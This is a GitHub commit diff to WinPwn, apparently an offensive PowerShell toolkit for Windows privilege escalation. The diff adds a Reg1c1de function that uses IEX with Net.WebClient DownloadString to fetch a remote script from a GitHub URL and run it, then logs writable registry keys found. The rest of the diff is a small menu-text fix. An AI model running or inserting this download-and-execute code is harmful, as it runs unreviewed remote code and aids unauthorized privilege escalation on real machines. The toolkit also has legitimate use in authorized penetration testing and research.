File tree Expand file tree Collapse file tree
Expand file tree Collapse file tree Original file line number Diff line number Diff line change @@ -2138,6 +2138,7 @@ function otherchecks
21382138 } Else {
21392139 Write-Host " Looks good! No system path can be written to by the current user." - ForegroundColor Green
21402140 }
2141+ Reg1c1de >> $currentPath \LocalPrivEsc\WritebleRegistryKeys.txt
21412142}
21422143
21432144function winPEAS
@@ -2160,6 +2161,12 @@ function winPEAS
21602161 REG DELETE HKCU\Console\ / v VirtualTerminalLevel / f
21612162}
21622163
2164+ function Reg1c1de
2165+ {
2166+ IEX(New-Object Net.WebClient).DownloadString(' https://raw.githubusercontent.com/S3cur3Th1sSh1t/Creds/master/PowershellScripts/Invoke-Reg1c1de.ps1' )
2167+ Invoke-Reg1c1de
2168+ }
2169+
21632170function privescmodules
21642171{
21652172<#
@@ -2193,7 +2200,7 @@ __ ___ ____
21932200 do
21942201 {
21952202 Write-Host " ================ WinPwn ================"
2196- Write-Host - ForegroundColor Green ' 1. itm4n´s Invoke-PrivescCheck'
2203+ Write-Host - ForegroundColor Green ' 1. itm4ns Invoke-PrivescCheck'
21972204 Write-Host - ForegroundColor Green ' 2. winPEAS! '
21982205 Write-Host - ForegroundColor Green ' 3. Powersploits privesc checks! '
21992206 Write-Host - ForegroundColor Green ' 4. All other checks! '
You can’t perform that action at this time.
0 commit comments